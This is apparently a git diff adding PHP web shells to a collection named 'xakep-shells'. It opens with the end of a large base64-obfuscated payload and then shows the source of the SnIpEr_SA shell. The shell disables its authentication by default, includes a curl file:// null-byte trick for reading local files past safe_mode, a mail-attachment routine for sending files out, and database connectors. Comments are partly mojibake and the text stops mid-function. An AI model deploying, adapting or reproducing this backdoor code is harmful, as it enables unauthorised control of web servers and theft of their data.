LtukRuRflBjuRHWN0sb+MfzJEvHRE+xBWQQGy9AIYeG/KmM3Qs09HdeBzvhMHpEZ0KNN78FvBt3MO+GWRB38+f5OUrnN1lYhud+aHhs186WMLJmDH2A4+hmxyC4i9ymK3NhkZqQdrK+vBn/xf5ZRGcNEG0HnFdEBQZ21J+oK9q9hL3XKcIPWvDvBL6X4Nzd+a6pP6PsOksZ4AJFadJby33exTSlTHb2QE4EN8e2B1XtKQz9TZFq9iOxoM93NGyhn3hNYWpvNhu1tzbrHFHQAB2h8uhODJX47QfO+pYvQnRoAo8688uGMwi7/oIAC/H3ILn9m3e9nBlEnbxXEv6RaG5J+RkLBy144TP0PcIWcvMaDCXASFtcyN6G8pLkohYY/kIqOaH+FmT8/Dve2rJraDgydk40CDziBIolCXXtj3oj8YkWlJcms6VHhVMDRF4njTScLehweUhrumAWY3Q2Q0jWu/9/gwle9b3+Wa17nXY3xByS/tq9dofaCGHX8JgfuKlf1KZdmcrxXAgxq33SHp4/xNwBg2L1AX+IsYi0QP7mhswkARk8BtV9ow+VWGbrufCHdcPNfCATKaDKVjIbEzilFczx/Zh6mJc9KcskSSBR0w4N+vqpyontBAzzbrD6hF3Z/LXQDufkwFkl+ioY28qDB43l8VXbavTN7Fsp8w8auhOWR7ws4Kcm/btDQCH2YiuCnn8SNXOJX0x5lk3YC17eanemuboSBKqAlz4Q1mxOQbDjb7un6tQa762VWw8MlrG5snNsEmMH4FXo9Wbv8KTEPl7ueipU8vGTwz+ChodEuXKozF5LK61NWuZovzoic2Y0X/Ws6AmQhkRGq5/TxMz8jfhy2SbrgO7ULK7qW87MD5CNfA5QlPmk15TTqdHQsyb6lzH7EsfPpdPI5h3yO+RaB+R5fCtjeKMOPSZZ+kGZ8jZrTC1aOEn14zPp5Xy34wT47SJhMHUDKlYzqA5GgtCrOvuaRVDD8rft6ATt/GW2tufxHx0XwpKGp0PVovbHI+akF04e+nE8wEmOuMFFRzcSb2rSN2jJMu8xTvCOL+o14N/TaoB8wIiTzotYFrpOp5dXweUDU1nVzZkGLBEjVdK7avPhcoSUOa8c64/TnmVZMPpTcQbiHFlaNHIOq+wJdgS2VUDodLqmnNaRLFJNJHuS5Gn/7gxy451uMrnGxe2viR1DBonc2A31lxC4ZIT099/6oE4rguVCp0a/IxMUScfc++7GE2I6E4Saef/JMEi+uCNRncDWyFFIbBgrPi9nwAbyjAkopG0PiY9qhX1k6DsKdMH9Ha24MzA5cRL9T80uqJKS8wdYoCs/2w0cDf67WNsPd5Jb4hmEF7IW7PsM8zVWRanYltrsDvN0PLhhR/z40a/TkWIXB5tvh9KhUq0oosBCR0X7Lh4s9G+kneuVRUcl+VwBqfzVnNBWetgWi7qzPStrz2c19gATN/G4oU+WEaAmU6++Jgw7qgGKgYnj0MVRLAYvZzUqkjB4zDvDEjtJXjuxsu/7bwsv35dJbel8GtLJzMD+KMROBIlh/aeFlhAHfGFlLxXCmTo7EujAm4FrwMsR+jNw2O/txLiJo7iXjuDOtVdMHJ2A7Qm2Iq1nxbkc87tTDYnyIie1aVmUz7Er8l1C8CF7hry7uorzEgRcWGKcQU4/BUYS6nEcteyJ/6Q1hrldBc/A67E1KwbC7bZTBqPkB4ncyQDoHpxAU6U7DcB0iNNdfhj1Hzfg4Px1ZnwTtIv+cn+gkH7stbWbkOWYe5ETLWN8XUMYmL/Qpj41uiDZEncqDL+J2IphTCpH44BFHO7ZO9f8E+p0lkYtw8bhba2nOgMlw70GOVxz9ImRT0V9xOIz1QPG+UprcxV8W0KXFw3w6y7LvDw092bI8oZB5NPHJfM0733VfvH3v3bght50nsfVhlRwUmmMB8hEQtZCkQ18jd9nBx4AH+BTgR5ak9yfqx7mZ56qkXMJDEF18CaQulgE73nPVQPmN2oMyajXJY/RW12Uyrw90fQjD8SeoL23kA0v59EFTA4S+QPhrP11pWP3n2EQCDJAynVVcZ/R21xcQBcd9b5MHjRU6AT7kQcm7DDuk/FrjVtPkoQlGhOywURlroFW717nS0KD7uNPOVKyf4lFyaSCqVVgROHIHibSXMj7XiAcZeWv0sYZSH0RtG3gur6s3iZzCy0zltHVhZN7d/6IY8q+cm8djiePxoC7RELD0dI8gpA5HYyhYdIt2mAvbNU8jrgsLDovMeMcM8YFSEy4xgwGkSvpR7CHGmUSAkYmMz9etIggSJCNNxt7LXR52ofIENmzzZCsrYlCP5tcK9eBmsvYjPjzZTuZo85Wmo106n+wBHw2pPU1htkeOCb/TRsuEl0wIjo6J1jAOV+eNtV8iTOpAOCYZSZ5fvyUBFjj3bYffM0CB7eKRezND/SOZinnh9nq2HhhgOa64WNafVQtcsVlx5dUJALxIBZKK6M6FV9LB2MClU1ocyp3He+93ygrT+95b6s0cVQe35CzG+5w83Ab0cWMo+eMc6JTNGx2ozbYpYrf3LD/4v54L3m3wmIPMNABOcEE/iMdEViodyGGtQbsPvEJRy9E3rhRXwe4A2oupyudmWNsLthc+ovo8vzcOTRB4mv/nK8kZ1xrNpq2dVUrbLcK8xVftKUeu5RfdYuVX1vCpQldrTcApkt+D2hFAKt4kqZMqtp/NhhNkyKKkCnjUq3+x/1I/y9KOpP5PgASNOGoTASc3XicM2IkBryOwf7ik0+uS1y2DFLt6OWOwxSNyQYdIIVis8Qg96u60OYJRSixXOts4dNaT8nj3SmTBMDobocrsz8kp4SM4+hIdUXJBcyEfn0X/aYaCFuy1tPaDJPc9WhYgi3MWldUK9qr2SLaegPP/tDHYyZ3pobb9jwIOBW6T19B160EsHcvxKIyAuvQLFJTPi3Z61xXYevsog07VbAiuppGaEL+Q2ehqzL24q7sApZeA9l1ioN/fobvflX/fUizAsJZSw2U1RLakdW/GLsgIoooeWSscvum5oirSfmTNm4l0qcJVrPor8RStrd/qr8TzEeHVIDS5Qu7tYUkJIApURSvq3uKz7rofb/usnZ41H3txUkiO3PUqYHTqjvLXiv0ccCKREueRgtDTyEIrDvg5V05ZB8/JsvNArFiyuCLxeDE0E1ySUy+pAcvrEwehZqOI3cwANDQq84agZw0/P2WN5ZL6aV5fgMduEvBc5oNITpnm95zUmX92V2lQXd7UMJGtZBMmn2hI9PYfY+dlQQv6kSe7/YMKg6+zxMCe/Dnq0KAoIC2BZboozJzDw5aOCAugMnqdgEJO8GmMFAoq0siSQjMNE4++yBc+tt8d4KadUC9hzuNBlFB+Fvy8uCEkJTjGvhtTeUtcTtlq+/3ZxF1Qcdz/gKHGbjXfCUsOGUMiz7G26eeMhD4zvEgemIkMjVoej//JLO4THRk32yysfHT064LvXPwB6Bal/UhuxJKsb50b9PFaV6GnmxlN+VeIenUuZ89uaOYgdCCukwioTq+peBUV5UVffpQVyrv2HPBU782DU1j/ZH7zeAzKEGHNoRXY+lK/LwUECYG3iYSgA82F+53hJ0/u0D7Nz+/YwIsX5yGsePY7vfIdzSWlg77bOKhpKhkKqm27ibYBvJ95oc34veXRg6lvK69cnKRyfne8bc6/+U8L0cSHJKPncMC0PDeDEIz76VWZUFZ90eIvyOsmppANNBGJROFOawNHQrqeyjRG7UXlNsxTZNaE2QcmB2gjuGMptOQoXcqjGIEHR89OxIIxyH/dU3bBfcy/Jr59PmVeAktwI6toSZpkKow9DmPdpPzU8IN30yWtfXMyH660feo+5bRE5VtmifNIPi21if58f4YnFdA6ZA8OrGWrFCuh9Rja6lTzz1Py1LSOlIIzGM5woomodNhVomFIQABs12272M6zehFfj13Hw5IO9yepm9HGgi51LRnbKWY+WzAEjNd8jCYy5VBhg4fg1JTOsjK3U2p8SLaLX/XBAIyl6v6Npd5iV7riWzCeV9Xvw5hSoKwGBKPaKYxE4db5I8YNDFlIBR7tVN2EnJwW4rxKsaTIWrB25DeC/SblI0DALjbZ+Aah1nyABWM2yvGU7MKDrzoJic+gDPY/yNWEJpmn8UOG0ifof16ZcPhMvup2B0o6Ho/PNtq1JEn2dHVeOjfZ8vuYc7bF0rxj+nu7XSxZjHdpHPUEZaO3VK2j44vDkrQqT7IT3yiTKByxoWlOuFD2k8ehggDksaYHWAb9FXRyWtYb4GG1vFVtSKinJn+XvL4a6iiRB7tBNaA71LWDarJKqVZrd6jXQSBeFJweQVk1cXe2VS6EURbszuIyZZ9FigLFBjbHFY+LulraQB1Pa6h3AhRQHvB5e/KofElWwB25+jXjmErtS4CIcKsEWAZFLAsi362RCqqQ/23GzO8LgVLYSeHsQgQyztjt1pLOGj5h0NCPbWQnxjqahdNSUjVLQ3jNr8A3oSPTErsULHGlPVO3OFKbTFOSv+EjWb9q+QGYFOvWtDUp1XRUYxe/JAxGQdkMt03R8PmM98+dZlS8METtsOFWIj5Y/tS1qKcJpgc+Eb5p0dQn/+J3qNCSpud84lcMbv9yhPiWc8XVTc85jlXTdrSClodGbXkbU2RQdl0UxKr1yRkcE+9LoJ3vw3auppGQSPNDKakSDeZx7U1zZDsqSXKDVWLXWNt40aBwnyzRpJpdx2gJtOWPZBXLo43WM8jVy1Y3eGaK9PUSQ8VvmZkET8Of5PL88bctVwEp5/Hx6fDl9QmaHcsLlUlP6QZOtX/6YLKOcbrECXsJllMaTtUpt+c6BPJXUfnnHC0XLX0L0etcwqPz3m0EACOmtgwaJ0Fg9y4u6+SDgTPPfJgN0AUOZ0r8nI6cJIY0sr/4Q/Ke2riq9tswc+JZ9QXwkB9ygzzacov5EX8pMz6yxBmmxib9N66hRA1lCF2C3DwMSdSTz6xfOOlbT6ayz+uI08bY01HA6Z0/FMCBf92ZvP3I6JM+x6dKV1BY198VL6U7mXfCg04N2P+c5Z0Y4FCHSh2MsjaHm9VBo3NWp29eW398Nvr1EwkjmfmiibIPMukVDj+kw8U7ph+PM6O6j2YJAQkwdasG10ppuuezmIPGXT170gfc/aqeChj5Xo+hV8ChvK2NeRlOBFGLrML3VoKx5bf28Kgj06hR5J5SDqMSKuaeBH7UJpcAKIh9GFoYrfavCEroqBbozs5hvCHCI1rfwH8TuF7UkH9lTLZgUofIAKfJFUZZNIsqx5kxDC8yXfMf60QAO++ATQcqKbX/7R1xQrRDqRyfrM1MoPGM/cHk4N0ieGaliotmiLS7K2KR1X2yXL3QmlWYrJTiUPr5VdublfdWDRVpbh+65IvMkE4aW9w2UZkWpoL/TvZAxIfUGCVx2c8nhbmI1RrBk2nDqw/Zls/6WntwAKzhU8HKBOMoqx344RYc7ANCqOW5LC0EUkzH3oUD4qyYTk3rAK2EL+rxqmrVqf1h/q9vCoYmkwoyedNw+/m2rPv3t41xkLIB0nBuINzkw8pPKpJRpY0N1JvNnsMyICqs2XT/K+ew0MEpWzGRVrzamJqb+coFbHrta5xsTtvHB6FabTK0fxjheWhr3yJcapaJ7WrzPuhoEnka7qjhaGqdYYeZdjbNfmptxuoZiB+U2IMUwKV5uVW93zxnZvdm7R9VDtnvHd8WRiUgBcO5vU8KzkwoVYz6xV6PB+oqKO6NQJlKVV7wQUjLArKCvZLgvtkASh4zI1x1pa9WHO43iJEBDYg3cwSkmbwAQ9aKbdr8atU3/4qCZTkYOA7AtsWlXRGOFumCvPw0LITT9K5muWRgd3qPfbj32CvkjWrzU3LdXfH++466N1Dr+pKUBdA71N2b+KbgtZZL2g29H5f35dnHb7+WD5MUhYOgjsVJPdeZ6iX7yggLfNbLxKbuc60ac/nmZ04f9cp25NS4ytVOGbM69nx6UV74xXG4ZH7CjwLlNr2rB8svtiM5iEYZpUB6PoH0YdgHednqDHCOucn8UF2CYVR3dsPlG7OJvS/qjA1e7LHCNcN6ZfN58aQGoiZSOlN2b2Ah4f5Agn5zf3GotuVUlE2A6QUa2wPHeYfeYpIuhCD9PiuKsv0gzDKfke6g+NQCuc1xuyOQDXJ/RKSB28a2bYljTVWq2Fck16FpdmAMhbj+hP5PmwMksppfNa9Ffu9leUP/bXAIpXZTHso7aneJxo4IUyVxLhS4KiqV8rGGtYFcCUQQ1jEqOKlBkdPm0sSj38lkrs/EbxTdZx+3gg28/D/NmXKKIyEJBNcLJmGMe3g/0nXmxQS2kkX/xTXyjgbkb6E4p5ZUofHwauBoff9VSwLh5pjTPfsRjWeIEecZmE1eT3NYa8ffKTSgOh5L29fOMAvs9hApdJhGpSCsgHu55W3+q0NP4dVzFCm434UlTR1disJV+oX3o4XKx7fPAYxSjYErMH/2FqTHwd9PngGrxpyiAjAKfrNYxVp2whXwWCAvF5EN/MjExys01ZoyEpTFQkZHr0YZ8W4hG4sB6LNid5JwR5KoA7VAkC/0z6GvaN3y3bspCugs9DN/v/tqKOp43FJ1Y03zMS9X/7jBo0DnxuyfXRqtDLvkBEoxUeJvZ9Q2kMUpb65Gp8ggPwbo5nk8FIUobLnV+WrBOkKup4F2pbWKlhR3a7gGdjNgqIH/7P12Be8b8RjrnvbWfZPhdbRQAAcrh3lKRNTSj0wtD1CvZsBMC0KSGUO4ujEbdTmZcn5fWVgNlzZxoa2i/Jlani9X2MM23PjFGu5L+KXnoPSd6m9baBzA2vsSu6lcCXhQNn6G3n06p447zuuA3tsrPz50KRKIXUK2n6IrOuJnZMEnkCXwtOe7c5IFUpfgd8jbs54h6+gFc2YPnz1zcC00DA1zPQRc6Iiu7SQZGmBfyLmQIYgjKzNhfmtuSbvrpSsulK06NbjNJCkGB324CHIKKM8znP2JfaaVpwwAd1jRZWNuFNpRT2x4V2NbTfloq0FUVkXPS0CwQCL34Rrky3gBRJF69OYvPZ6pU1frNVRb1va53FjS1QGXQwxMStZdjzACQn7Y63kX2gRsblCt2f1WskfFypeYZjsdKsCOHPE0v9uvSaOqcKFr2/FrLT8IRzL5fMJmSskbM8x7t+VheLBDP9WOiQo9WNhDlJNs1MU9HkI5hjIAujY2icC0sQnwBGxgNGdssOhdSqcWkzP7c06ZSHg38PUumYMkhltudCFuROuQbxs4XBBC32Fn3SqrXeX1Im5VYOB5Z8g3F6cwyTtEPj78NevHqsuWbDLHluVCwLiTSC81oSvLGT+0NFg3X8TtTmUiafXZO2KgZWBaaG2WhAanC+SIMWxZdNR53jBDAPF8Cr4rJwknNi6+dul9PouERq3yaxMf9bdq8lN/EV4XkRubfF0Ji0EAMgUc2puEUKtx/SnXO8Ac8ldJbMqlZGbMTv3L3fLuPHllqPQUHu/kh6I0yloTh2BBzlygJA41n0nY/DehTnSu85nNxjz38SNMklbIYrfiqmKb827DI2JkNYYqI2+2il9fO+0lU/7E9Ut3ur+4jk6ucn5xnhy96s0zRlXiYPV8MtCHpA1PnefRLYVZyM9uvuVEI5ncuZAVnTX3frD+uy26BkdebddaGaKpl8vh07pUBDFmdO1ch+12W/YFjBKp3R29+iof2UqzWVWFkRZmNv1KEQX1RobkFtIsSKM/8HSlwuc80ZY5ScUWxE7huLsGacoaKjbVhQ4xBycgK8JHGIjdqIeRZj/f81MbSQAEB8Vdno/VGGh2H3KXHS1+uN44zVLJHPqviGkodlr4FEKzbOq70qdXLwHTYfrwyy1JOmMXkFzSoPc9wSK++1Tk5ET3R+9Z7nppH5BJ3+C/8u4lySsUjeLoD3esy1b9MsTfVRGNu5ut1vDwqGs66/PupwFZeanryBEoOJAV44IeyJQRh7J6PKCQFhAUpVMfOv+BjRxPF7qINY82OsyhzEwMaCDT3kYm78OQyKiHsLVDVX/KMaV2gsjgHMecTpBYdOGzrUgFrNd2LDKvydGIlAlU3bwJwt0VnjT6OPgEz1RgD6vfaVjQY6e08SpEpCbhhuIRftcb0j9hU3S2ewoNueEgtufz2BQimXvGZstxFjG8sOuwNKBpKtQ+KLCph6WZuxbXl6iknTKRaPVpOfyZuhyW37gxR0rlzZyIZ+lVuV+MBaoKfnyN3yhfN3mJmhduID5UkFGRd00LokinQPMLausqXukoA0wp9KWOHgY9QPJ9F/blc+kHoPvsuuphIPeFztps+cihflzVTdlWVyXeCv3EMGzsbvnhNH+ncgVlU2JbyoG+zHLjmfIHzigvj7uTsLRcTdfcdNbezFgzt/uLZdapfQr37RAs2q9VLAQbAz0S3RXg2g1/uDnKox1eZReq2uPsN7EfvBn3eOn/N0DD2nLAVFpBXo/66ee7Js/C0OT9Cr+DzPelKcQT89+H9etZdqmjItjEA8KJv957Fj8f5MODzRDhroy/BcZYw9oCk3+KLaPtaFd3Cpq3NjQGLGBUkA84Od3+XJWno15JgEa8UwQAmYwW8087XG2q+XFBMBLB4zpVtuOcQPVWYuFPCwX7Dy0qgMDIoxFok17v1UzBfX6F8NKkHGSep39oKmpBZDLMyZRWHELQtgspkWjrcZLD4PNcLquX03jCQbtBvz0HqGX+M8jK80GijrcQQqTA6gTJB9Jx9altcmd5WcU2ToIwSd9YzU3gS/27CvgyvRX56OzXdkv0su0NWLEQBdJGskZ8PBOqoZIHRiIdvMhYVyDb1LVtrU+Af65fmP/L5wQC65l7gZIlgZIfOI2d1kuCK0HYEku0niP2Ac+NDkIAi/rnb7uE0QhtgdnXUtEGiPkXcVi6WpnCHyrYR4fV+Gz7ymI1dKtDvAe6ZnOH4Fdod5IDweQBnvI1+MDAkJ9+ivrsy3FFXSX15ualJvoGcXDSBpq5cxHSkvJTdWS0cWWlTWhuB+5t1GbGyKgvUjDyGLhZR5ZoeE6uov4AxuNFq2sPWy716JzEf7QA2FtioRMyPqYxR3m3JrglM57118jaRxaSKPE1PB2vEQHcPvhaZ9CMDSebIk/FbAzAqRjFG6kE31rZFb3j7SrPjxz4FMLdLGXJN1i5fvpqOgy+NIGZ+IaPWc+1FLZJ0y5jRweTQrrzaFiRcFXbAkDo0wYfVcNf1RNM0zsC02o6rsS5p1V3n66/QCjRN87RrRU6Tvy1NUhQIgoVlWe8v7vz33//9888///8P'))); 
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/sniper_sa_shell.txt b/xakep-shells/PHP/sniper_sa_shell.txt
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/xakep-shells/PHP/sniper_sa_shell.txt
@@ -0,0 +1,2246 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ �������� | Options  ~~~ */
+
+// ����� | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - ������ ������ ����� ������  ( authentification = On  )
+// $auth = 0; - ������ ������ ����� ������ ( authentification = Off )
+$auth = 0;
+
+// ����� ����� ���� ���� ������ (Login & Password for access)
+// ������ ������� �� ���� ���� ��� ������!!! (CHANGE THIS!!!)
+// ��� ���� ���� ������ ��� ����� ����� md5, ������ ������ ��� ��  'r57'
+// ������� �� ���� ���� ����� ���� �������� ����� md5 ������ �� ������� �������
+$name='ec371748dc2da624b35a4f8f685dd122'; // ��� ��������  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ���� ������ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
